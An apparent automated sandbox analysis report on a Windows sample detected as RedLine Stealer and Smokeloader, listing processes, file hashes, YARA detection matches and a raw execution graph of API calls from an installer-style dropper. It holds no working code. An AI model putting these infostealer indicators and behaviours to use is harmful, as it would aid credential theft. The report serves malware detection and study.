                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.302283247.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000003.302283247.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:20:58:37
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                  Imagebase:0x7ff6922f0000
                                                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                  Start time:20:58:44
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:400896 bytes
                                                                                                                                                                                                                                  MD5 hash:C49DABA1E54976E33808914E11DEE05B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.412282672.0000000002E28000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.412058173.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.346294709.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                  Start time:20:58:48
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                  Imagebase:0x7ff6922f0000
                                                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:23.8%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:65.7%
                                                                                                                                                                                                                                    Signature Coverage:25.9%
                                                                                                                                                                                                                                    Total number of Nodes:974
                                                                                                                                                                                                                                    Total number of Limit Nodes:26
                                                                                                                                                                                                                                    execution_graph 3425 404cc0 GlobalFree 3505 406f40 SetUnhandledExceptionFilter 3526 404200 3527 40420b SendMessageA 3526->3527 3528 40421e 3526->3528 3527->3528 3529 403100 3530 4031b0 3529->3530 3531 403111 3529->3531 3532 4031b9 SendDlgItemMessageA 3530->3532 3536 403141 3530->3536 3533 403149 GetDesktopWindow 3531->3533 3535 40311d 3531->3535 3532->3536 3537 4043d0 11 API calls 3533->3537 3534 403138 EndDialog 3534->3536 3535->3534 3535->3536 3538 40315d 6 API calls 3537->3538 3538->3536 3598 4030c0 3599 4030de CallWindowProcA 3598->3599 3601 4030ce 3598->3601 3600 4030da 3599->3600 3601->3599 3601->3600 3602 404bc0 3604 404bd7 3602->3604 3605 404c05 3602->3605 3603 404c1b SetFilePointer 3603->3604 3605->3603 3605->3604 3606 4063c0 3607 406407 3606->3607 3608 40658a CharPrevA 3607->3608 3609 406415 CreateFileA 3608->3609 3610 406448 WriteFile 3609->3610 3611 40643a 3609->3611 3612 406465 CloseHandle 3610->3612 3614 406ce0 4 API calls 3611->3614 3612->3611 3615 40648f 3614->3615 3539 406c03 3540 406c17 _exit 3539->3540 3541 406c1e 3539->3541 3540->3541 3542 406c27 _cexit 3541->3542 3543 406c32 3541->3543 3542->3543 3426 404cd0 3427 404cf4 3426->3427 3428 404d0b 3426->3428 3429 404d02 3427->3429 3430 404b60 FindCloseChangeNotification 3427->3430 3428->3429 3432 404dcb 3428->3432 3435 404d25 3428->3435 3431 406ce0 4 API calls 3429->3431 3430->3429 3433 404e95 3431->3433 3434 404dd4 SetDlgItemTextA 3432->3434 3436 404de3 3432->3436 3434->3436 3435->3429 3449 404c37 3435->3449 3436->3429 3454 40476d 3436->3454 3440 404e38 3440->3429 3442 404980 25 API calls 3440->3442 3441 404b60 FindCloseChangeNotification 3443 404d99 SetFileAttributesA 3441->3443 3444 404e56 3442->3444 3443->3429 3444->3429 3445 404e64 3444->3445 3463 4047e0 LocalAlloc 3445->3463 3448 404e6f 3448->3429 3450 404c4c DosDateTimeToFileTime 3449->3450 3451 404c88 3449->3451 3450->3451 3452 404c5e LocalFileTimeToFileTime 3450->3452 3451->3429 3451->3441 3452->3451 3453 404c70 SetFileTime 3452->3453 3453->3451 3472 4066ae GetFileAttributesA 3454->3472 3456 40477b 3456->3440 3457 4047cc SetFileAttributesA 3459 4047db 3457->3459 3459->3440 3460 406517 24 API calls 3461 4047b1 3460->3461 3461->3457 3461->3459 3462 4047c2 3461->3462 3462->3457 3464 4047f6 3463->3464 3466 40480f 3463->3466 3465 4044b9 20 API calls 3464->3465 3471 40480b 3465->3471 3466->3466 3467 40481b LocalAlloc 3466->3467 3468 404831 3467->3468 3467->3471 3469 4044b9 20 API calls 3468->3469 3470 404846 LocalFree 3469->3470 3470->3471 3471->3448 3473 404777 3472->3473 3473->3456 3473->3457 3473->3460 3474 404ad0 3482 403680 3474->3482 3477 404ae9 3478 404aee WriteFile 3479 404b14 3478->3479 3480 404b0f 3478->3480 3479->3480 3481 404b3b SendDlgItemMessageA 3479->3481 3481->3480 3483 403691 MsgWaitForMultipleObjects 3482->3483 3484 4036e8 3483->3484 3485 4036a9 PeekMessageA 3483->3485 3484->3477 3484->3478 3485->3483 3488 4036bc 3485->3488 3486 4036c7 DispatchMessageA 3487 4036d1 PeekMessageA 3486->3487 3487->3488 3488->3483 3488->3484 3488->3486 3488->3487 3506 403450 3507 4034d3 EndDialog 3506->3507 3508 40345e 3506->3508 3509 40346a 3507->3509 3510 40349a GetDesktopWindow 3508->3510 3514 403465 3508->3514 3515 4043d0 6 API calls 3510->3515 3513 40348c EndDialog 3513->3509 3514->3509 3514->3513 3516 404463 SetWindowPos 3515->3516 3518 406ce0 4 API calls 3516->3518 3519 4034ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3518->3519 3519->3509 3520 404a50 3521 404a66 3520->3521 3522 404a9f ReadFile 3520->3522 3523 404abb 3521->3523 3524 404a82 memcpy 3521->3524 3522->3523 3524->3523 3544 403210 3545 403227 3544->3545 3568 40328e EndDialog 3544->3568 3547 4033e2 GetDesktopWindow 3545->3547 3548 403235 3545->3548 3549 4043d0 11 API calls 3547->3549 3550 40324c 3548->3550 3551 4032dd GetDlgItemTextA 3548->3551 3575 403239 3548->3575 3552 4033f1 SetWindowTextA SendDlgItemMessageA 3549->3552 3553 403251 3550->3553 3554 4032c5 EndDialog 3550->3554 3556 403366 3551->3556 3561 4032fc 3551->3561 3555 40341f GetDlgItem EnableWindow 3552->3555 3552->3575 3557 40325c LoadStringA 3553->3557 3553->3575 3554->3575 3555->3575 3560 4044b9 20 API calls 3556->3560 3558 403294 3557->3558 3559 40327b 3557->3559 3582 404224 LoadLibraryA 3558->3582 3564 4044b9 20 API calls 3559->3564 3560->3575 3561->3556 3563 403331 GetFileAttributesA 3561->3563 3566 40337c 3563->3566 3567 40333f 3563->3567 3564->3568 3571 40658a CharPrevA 3566->3571 3570 4044b9 20 API calls 3567->3570 3568->3575 3569 4032a5 SetDlgItemTextA 3569->3559 3569->3575 3573 403351 3570->3573 3572 40338d 3571->3572 3574 4058c8 27 API calls 3572->3574 3573->3575 3576 40335a CreateDirectoryA 3573->3576 3577 403394 3574->3577 3576->3556 3576->3566 3577->3556 3578 4033a4 3577->3578 3579 4033c7 EndDialog 3578->3579 3580 40597d 34 API calls 3578->3580 3579->3575 3581 4033c3 3580->3581 3581->3575 3581->3579 3583 4043b2 3582->3583 3584 404246 GetProcAddress 3582->3584 3588 4044b9 20 API calls 3583->3588 3585 4043a4 FreeLibrary 3584->3585 3586 40425d GetProcAddress 3584->3586 3585->3583 3586->3585 3587 404274 GetProcAddress 3586->3587 3587->3585 3589 40428b 3587->3589 3590 40329d 3588->3590 3591 404295 GetTempPathA 3589->3591 3596 4042e1 3589->3596 3590->3569 3590->3575 3592 4042ad 3591->3592 3592->3592 3593 4042b4 CharPrevA 3592->3593 3594 4042d0 CharPrevA 3593->3594 3593->3596 3594->3596 3595 404390 FreeLibrary 3595->3590 3596->3595 2568 406a60 2585 407155 2568->2585 2570 406a65 2571 406a76 GetStartupInfoW 2570->2571 2572 406a93 2571->2572 2573 406aa8 2572->2573 2574 406aaf Sleep 2572->2574 2575 406ac7 _amsg_exit 2573->2575 2576 406ad1 2573->2576 2574->2572 2575->2576 2577 406b13 _initterm 2576->2577 2579 406b2e __IsNonwritableInCurrentImage 2576->2579 2580 406af4 2576->2580 2577->2579 2578 406bd6 _ismbblead 2578->2579 2579->2578 2582 406c1e 2579->2582 2583 406bbe exit 2579->2583 2590 402bfb GetVersion 2579->2590 2582->2580 2584 406c27 _cexit 2582->2584 2583->2579 2584->2580 2586 40717a 2585->2586 2587 40717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2585->2587 2586->2587 2588 4071e2 2586->2588 2589 4071cd 2587->2589 2588->2570 2589->2588 2591 402c50 2590->2591 2592 402c0f 2590->2592 2607 402caa memset memset memset 2591->2607 2592->2591 2593 402c13 GetModuleHandleW 2592->2593 2593->2591 2595 402c22 GetProcAddress 2593->2595 2595->2591 2604 402c34 2595->2604 2597 402c8e 2599 402c97 CloseHandle 2597->2599 2600 402c9e 2597->2600 2599->2600 2600->2579 2604->2591 2605 402c89 2701 401f90 2605->2701 2718 40468f FindResourceA SizeofResource 2607->2718 2610 402d2d CreateEventA SetEvent 2612 40468f 7 API calls 2610->2612 2611 402ef3 2613 4044b9 20 API calls 2611->2613 2614 402d57 2612->2614 2615 402d6e 2613->2615 2616 402d5b 2614->2616 2618 402e1f 2614->2618 2621 40468f 7 API calls 2614->2621 2723 406ce0 2615->2723 2728 4044b9 2616->2728 2757 405c9e 2618->2757 2620 402c62 2620->2597 2648 402f1d 2620->2648 2624 402d9f 2621->2624 2624->2616 2627 402da3 CreateMutexA 2624->2627 2625 402e30 2625->2611 2626 402e3a 2628 402e52 FindResourceA 2626->2628 2629 402e43 2626->2629 2627->2618 2630 402dbd GetLastError 2627->2630 2633 402e64 LoadResource 2628->2633 2634 402e6e 2628->2634 2783 402390 2629->2783 2630->2618 2632 402dca 2630->2632 2636 402dd5 2632->2636 2637 402dea 2632->2637 2633->2634 2635 402e4d 2634->2635 2798 4036ee GetVersionExA 2634->2798 2635->2615 2638 4044b9 20 API calls 2636->2638 2639 4044b9 20 API calls 2637->2639 2640 402de8 2638->2640 2641 402dff 2639->2641 2643 402e04 CloseHandle 2640->2643 2641->2618 2641->2643 2643->2615 2649 402f6c 2648->2649 2650 402f3f 2648->2650 2942 405164 2649->2942 2652 402f5f 2650->2652 2923 4051e5 2650->2923 3070 403a3f 2652->3070 2654 402f71 2657 40303c 2654->2657 2955 4055a0 2654->2955 2661 406ce0 4 API calls 2657->2661 2662 402c6b 2661->2662 2688 4052b6 2662->2688 2663 402f86 GetSystemDirectoryA 2664 40658a CharPrevA 2663->2664 2665 402fab LoadLibraryA 2664->2665 2666 402fc0 GetProcAddress 2665->2666 2667 402ff7 FreeLibrary 2665->2667 2666->2667 2670 402fd6 DecryptFileA 2666->2670 2668 403006 2667->2668 2669 403017 SetCurrentDirectoryA 2667->2669 2668->2669 3003 40621e GetWindowsDirectoryA 2668->3003 2671 403054 2669->2671 2672 403026 2669->2672 2670->2667 2677 402ff0 2670->2677 2674 403061 2671->2674 3013 403b26 2671->3013 2676 4044b9 20 API calls 2672->2676 2674->2657 2679 40307a 2674->2679 3022 40256d 2674->3022 2681 403037 2676->2681 2677->2667 2683 403098 2679->2683 3033 403ba2 2679->3033 3089 406285 GetLastError 2681->3089 2683->2657 2685 4030af 2683->2685 3091 404169 2685->3091 2689 4052d6 2688->2689 2697 405316 2688->2697 2692 405300 LocalFree LocalFree 2689->2692 2694 4052eb SetFileAttributesA DeleteFileA 2689->2694 2690 405374 2691 40538c 2690->2691 3421 401fe1 2690->3421 2693 406ce0 4 API calls 2691->2693 2692->2689 2692->2697 2695 402c72 2693->2695 2694->2692 2695->2597 2695->2605 2697->2690 2698 40535e SetCurrentDirectoryA 2697->2698 2699 4065e8 4 API calls 2697->2699 2700 402390 13 API calls 2698->2700 2699->2698 2700->2690 2702 401f9f 2701->2702 2703 401f9a 2701->2703 2705 401fc0 2702->2705 2706 4044b9 20 API calls 2702->2706 2710 401fd9 2702->2710 2704 401ea7 15 API calls 2703->2704 2704->2702 2707 401ee2 GetCurrentProcess OpenProcessToken 2705->2707 2708 401fcf ExitWindowsEx 2705->2708 2705->2710 2706->2705 2711 401f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2707->2711 2712 401f0e 2707->2712 2708->2710 2710->2597 2711->2712 2713 401f6b ExitWindowsEx 2711->2713 2715 4044b9 20 API calls 2712->2715 2713->2712 2714 401f1f 2713->2714 2716 406ce0 4 API calls 2714->2716 2715->2714 2717 401f8c 2716->2717 2717->2597 2719 4046b6 2718->2719 2720 402d1a 2718->2720 2719->2720 2721 4046be FindResourceA LoadResource LockResource 2719->2721 2720->2610 2720->2611 2721->2720 2722 4046df memcpy_s FreeResource 2721->2722 2722->2720 2724 406ce8 2723->2724 2725 406ceb 2723->2725 2724->2620 2840 406cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2725->2840 2727 406e26 2727->2620 2729 40455a 2728->2729 2730 4044fe LoadStringA 2728->2730 2733 406ce0 4 API calls 2729->2733 2731 404562 2730->2731 2732 404527 2730->2732 2738 4045c9 2731->2738 2739 40457e LocalAlloc 2731->2739 2734 40681f 10 API calls 2732->2734 2735 404689 2733->2735 2736 40452c 2734->2736 2735->2615 2737 404536 MessageBoxA 2736->2737 2853 4067c9 2736->2853 2737->2729 2741 404607 LocalAlloc 2738->2741 2742 4045cd LocalAlloc 2738->2742 2739->2729 2751 4045af 2739->2751 2741->2729 2744 4045c4 2741->2744 2742->2729 2746 4045f3 2742->2746 2747 40462d MessageBeep 2744->2747 2749 40171e _vsnprintf 2746->2749 2841 40681f 2747->2841 2749->2744 2859 40171e 2751->2859 2754 404645 MessageBoxA LocalFree 2754->2729 2756 4067c9 EnumResourceLanguagesA 2756->2754 2764 405e17 2757->2764 2780 405cc3 2757->2780 2758 405dd0 2762 405dec GetModuleFileNameA 2758->2762 2758->2764 2759 406ce0 4 API calls 2760 402e2c 2759->2760 2760->2625 2760->2626 2761 405ced CharNextA 2761->2780 2763 405e0a 2762->2763 2762->2764 2869 4066c8 2763->2869 2764->2759 2766 406218 2878 406e2a 2766->2878 2769 405e36 CharUpperA 2770 4061d0 2769->2770 2769->2780 2771 4044b9 20 API calls 2770->2771 2772 4061e7 2771->2772 2773 4061f0 CloseHandle 2772->2773 2774 4061f7 ExitProcess 2772->2774 2773->2774 2775 405f9f CharUpperA 2775->2780 2776 405f59 CompareStringA 2776->2780 2777 406003 CharUpperA 2777->2780 2778 405edc CharUpperA 2778->2780 2779 4060a2 CharUpperA 2779->2780 2780->2758 2780->2761 2780->2764 2780->2766 2780->2769 2780->2775 2780->2776 2780->2777 2780->2778 2780->2779 2781 40667f IsDBCSLeadByte CharNextA 2780->2781 2874 40658a 2780->2874 2781->2780 2784 4024cb 2783->2784 2787 4023b9 2783->2787 2785 406ce0 4 API calls 2784->2785 2786 4024dc 2785->2786 2786->2635 2787->2784 2788 4023e9 FindFirstFileA 2787->2788 2788->2784 2789 402407 2788->2789 2790 402421 lstrcmpA 2789->2790 2791 402479 2789->2791 2793 4024a9 FindNextFileA 2789->2793 2796 40658a CharPrevA 2789->2796 2797 402390 5 API calls 2789->2797 2792 402431 lstrcmpA 2790->2792 2790->2793 2794 402488 SetFileAttributesA DeleteFileA 2791->2794 2792->2789 2792->2793 2793->2789 2795 4024bd FindClose RemoveDirectoryA 2793->2795 2794->2793 2795->2784 2796->2789 2797->2789 2803 403737 2798->2803 2804 40372d 2798->2804 2799 4044b9 20 API calls 2800 4039fc 2799->2800 2801 406ce0 4 API calls 2800->2801 2802 402e92 2801->2802 2802->2615 2802->2635 2813 4018a3 2802->2813 2803->2800 2803->2804 2806 4038a4 2803->2806 2885 4028e8 2803->2885 2804->2799 2804->2800 2806->2800 2806->2804 2807 4039c1 MessageBeep 2806->2807 2808 40681f 10 API calls 2807->2808 2809 4039ce 2808->2809 2810 4039d8 MessageBoxA 2809->2810 2811 4067c9 EnumResourceLanguagesA 2809->2811 2810->2800 2811->2810 2814 4018d5 2813->2814 2820 4019b8 2813->2820 2914 4017ee LoadLibraryA 2814->2914 2816 406ce0 4 API calls 2818 4019d5 2816->2818 2818->2635 2833 406517 FindResourceA 2818->2833 2819 4018e5 GetCurrentProcess OpenProcessToken 2819->2820 2821 401900 GetTokenInformation 2819->2821 2820->2816 2822 401918 GetLastError 2821->2822 2823 4019aa CloseHandle 2821->2823 2822->2823 2824 401927 LocalAlloc 2822->2824 2823->2820 2825 401938 GetTokenInformation 2824->2825 2826 4019a9 2824->2826 2827 4019a2 LocalFree 2825->2827 2828 40194e AllocateAndInitializeSid 2825->2828 2826->2823 2827->2826 2828->2827 2829 40196e 2828->2829 2830 401999 FreeSid 2829->2830 2831 401975 EqualSid 2829->2831 2832 40198c 2829->2832 2830->2827 2831->2829 2831->2832 2832->2830 2834 406536 LoadResource 2833->2834 2835 40656b 2833->2835 2834->2835 2836 406544 DialogBoxIndirectParamA FreeResource 2834->2836 2837 4044b9 20 API calls 2835->2837 2836->2835 2838 40657c 2836->2838 2837->2838 2838->2635 2840->2727 2842 406940 2841->2842 2843 406857 GetVersionExA 2841->2843 2844 406ce0 4 API calls 2842->2844 2845 40687c 2843->2845 2852 40691a 2843->2852 2846 40463b 2844->2846 2847 4068a5 GetSystemMetrics 2845->2847 2845->2852 2846->2754 2846->2756 2848 4068b5 RegOpenKeyExA 2847->2848 2847->2852 2849 4068d6 RegQueryValueExA RegCloseKey 2848->2849 2848->2852 2850 40690c 2849->2850 2849->2852 2863 4066f9 2850->2863 2852->2842 2854 4067e2 2853->2854 2857 406803 2853->2857 2867 406793 EnumResourceLanguagesA 2854->2867 2856 4067f5 2856->2857 2868 406793 EnumResourceLanguagesA 2856->2868 2857->2737 2860 40172d 2859->2860 2861 40173d _vsnprintf 2860->2861 2862 40175d 2860->2862 2861->2862 2862->2744 2864 40670f 2863->2864 2865 406740 CharNextA 2864->2865 2866 40674b 2864->2866 2865->2864 2866->2852 2867->2856 2868->2857 2870 4066d5 2869->2870 2871 4066f3 2870->2871 2873 4066e5 CharNextA 2870->2873 2881 406648 2870->2881 2871->2764 2873->2870 2875 40659b 2874->2875 2875->2875 2876 4065ab 2875->2876 2877 4065b8 CharPrevA 2875->2877 2876->2780 2877->2876 2884 406cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2878->2884 2880 40621d 2882 406668 2881->2882 2883 40665d IsDBCSLeadByte 2881->2883 2882->2870 2883->2882 2884->2880 2886 402a62 2885->2886 2892 40290d 2885->2892 2887 402a75 2886->2887 2888 402a6e GlobalFree 2886->2888 2887->2806 2888->2887 2890 402955 GlobalAlloc 2890->2886 2891 402968 GlobalLock 2890->2891 2891->2886 2891->2892 2892->2886 2892->2890 2893 402a20 GlobalUnlock 2892->2893 2894 402a80 GlobalUnlock 2892->2894 2895 402773 2892->2895 2893->2892 2894->2886 2896 4028b2 2895->2896 2897 4027a3 CharUpperA CharNextA CharNextA 2895->2897 2898 4028b7 GetSystemDirectoryA 2896->2898 2897->2898 2899 4027db 2897->2899 2902 4028bf 2898->2902 2900 4027e3 2899->2900 2901 4028a8 GetWindowsDirectoryA 2899->2901 2906 40658a CharPrevA 2900->2906 2901->2902 2903 4028d2 2902->2903 2904 40658a CharPrevA 2902->2904 2905 406ce0 4 API calls 2903->2905 2904->2903 2907 4028e2 2905->2907 2908 402810 RegOpenKeyExA 2906->2908 2907->2892 2908->2902 2909 402837 RegQueryValueExA 2908->2909 2910 40289a RegCloseKey 2909->2910 2911 40285c 2909->2911 2910->2902 2912 402867 ExpandEnvironmentStringsA 2911->2912 2913 40287a 2911->2913 2912->2913 2913->2910 2915 401890 2914->2915 2916 401826 GetProcAddress 2914->2916 2917 406ce0 4 API calls 2915->2917 2918 401889 FreeLibrary 2916->2918 2919 401839 AllocateAndInitializeSid 2916->2919 2920 40189f 2917->2920 2918->2915 2919->2918 2922 40185f FreeSid 2919->2922 2920->2819 2920->2820 2922->2918 2924 40468f 7 API calls 2923->2924 2925 4051f9 LocalAlloc 2924->2925 2926 40522d 2925->2926 2927 40520d 2925->2927 2928 40468f 7 API calls 2926->2928 2929 4044b9 20 API calls 2927->2929 2931 40523a 2928->2931 2930 40521e 2929->2930 2932 406285 GetLastError 2930->2932 2933 405262 lstrcmpA 2931->2933 2934 40523e 2931->2934 2941 402f4d 2932->2941 2936 405272 LocalFree 2933->2936 2937 40527e 2933->2937 2935 4044b9 20 API calls 2934->2935 2938 40524f LocalFree 2935->2938 2936->2941 2939 4044b9 20 API calls 2937->2939 2938->2941 2940 405290 LocalFree 2939->2940 2940->2941 2941->2649 2941->2652 2941->2657 2943 40468f 7 API calls 2942->2943 2944 405175 2943->2944 2945 40517a 2944->2945 2946 4051af 2944->2946 2947 4044b9 20 API calls 2945->2947 2948 40468f 7 API calls 2946->2948 2949 40518d 2947->2949 2950 4051c0 2948->2950 2949->2654 3104 406298 2950->3104 2953 4051e1 2953->2654 2954 4044b9 20 API calls 2954->2949 2956 40468f 7 API calls 2955->2956 2957 4055c7 LocalAlloc 2956->2957 2958 4055db 2957->2958 2959 4055fd 2957->2959 2960 4044b9 20 API calls 2958->2960 2961 40468f 7 API calls 2959->2961 2962 4055ec 2960->2962 2963 40560a 2961->2963 2964 406285 GetLastError 2962->2964 2965 405632 lstrcmpA 2963->2965 2966 40560e 2963->2966 2991 4055f1 2964->2991 2968 405645 2965->2968 2969 40564b LocalFree 2965->2969 2967 4044b9 20 API calls 2966->2967 2970 40561f LocalFree 2967->2970 2968->2969 2971 405696 2969->2971 2972 40565b 2969->2972 2970->2991 2973 40589f 2971->2973 2974 4056ae GetTempPathA 2971->2974 2979 405467 49 API calls 2972->2979 2975 406517 24 API calls 2973->2975 2977 4056eb 2974->2977 2978 4056c3 2974->2978 2975->2991 2976 406ce0 4 API calls 2980 402f7e 2976->2980 2985 405717 GetDriveTypeA 2977->2985 2986 40586c GetWindowsDirectoryA 2977->2986 2977->2991 3116 405467 2978->3116 2982 405678 2979->2982 2980->2657 2980->2663 2984 4044b9 20 API calls 2982->2984 2982->2991 2984->2991 2989 405730 GetFileAttributesA 2985->2989 3001 40572b 2985->3001 3150 40597d GetCurrentDirectoryA SetCurrentDirectoryA 2986->3150 2989->3001 2991->2976 2992 40597d 34 API calls 2992->3001 2993 405467 49 API calls 2993->2977 2994 402630 21 API calls 2994->3001 2996 4057c1 GetWindowsDirectoryA 2996->3001 2997 40658a CharPrevA 2998 4057e8 GetFileAttributesA 2997->2998 2999 4057fa CreateDirectoryA 2998->2999 2998->3001 2999->3001 3000 405827 SetFileAttributesA 3000->3001 3001->2985 3001->2986 3001->2989 3001->2991 3001->2992 3001->2994 3001->2996 3001->2997 3001->3000 3002 405467 49 API calls 3001->3002 3146 406952 3001->3146 3002->3001 3004 406268 3003->3004 3005 406249 3003->3005 3006 40597d 34 API calls 3004->3006 3007 4044b9 20 API calls 3005->3007 3008 40625f 3006->3008 3009 40625a 3007->3009 3010 406ce0 4 API calls 3008->3010 3011 406285 GetLastError 3009->3011 3012 403013 3010->3012 3011->3008 3012->2657 3012->2669 3014 403b2d 3013->3014 3014->3014 3015 403b72 3014->3015 3017 403b53 3014->3017 3216 404fe0 3015->3216 3018 406517 24 API calls 3017->3018 3019 403b70 3018->3019 3020 406298 10 API calls 3019->3020 3021 403b7b 3019->3021 3020->3021 3021->2674 3023 402622 3022->3023 3024 402583 3022->3024 3267 4024e0 GetWindowsDirectoryA 3023->3267 3025 4025e8 RegOpenKeyExA 3024->3025 3026 40258b 3024->3026 3028 402609 RegQueryInfoKeyA 3025->3028 3029 4025e3 3025->3029 3026->3029 3030 40259b RegOpenKeyExA 3026->3030 3031 4025d1 RegCloseKey 3028->3031 3029->2679 3030->3029 3032 4025bc RegQueryValueExA 3030->3032 3031->3029 3032->3031 3034 403bdb 3033->3034 3049 403bec 3033->3049 3035 40468f 7 API calls 3034->3035 3035->3049 3036 403c03 memset 3036->3049 3037 403d13 3038 4044b9 20 API calls 3037->3038 3045 403d26 3038->3045 3039 40468f 7 API calls 3039->3049 3041 406ce0 4 API calls 3042 403f60 3041->3042 3042->2683 3043 403fd7 3043->3045 3366 402267 3043->3366 3044 403d7b CompareStringA 3044->3043 3044->3049 3045->3041 3047 403fab 3050 4044b9 20 API calls 3047->3050 3049->3036 3049->3037 3049->3039 3049->3043 3049->3044 3049->3045 3049->3047 3051 403f46 LocalFree 3049->3051 3052 403f1e LocalFree 3049->3052 3056 403cc7 CompareStringA 3049->3056 3067 403e10 3049->3067 3275 401ae8 3049->3275 3316 40202a memset memset RegCreateKeyExA 3049->3316 3342 403fef 3049->3342 3054 403fbe LocalFree 3050->3054 3051->3045 3052->3043 3052->3049 3054->3045 3056->3049 3057 403f92 3059 4044b9 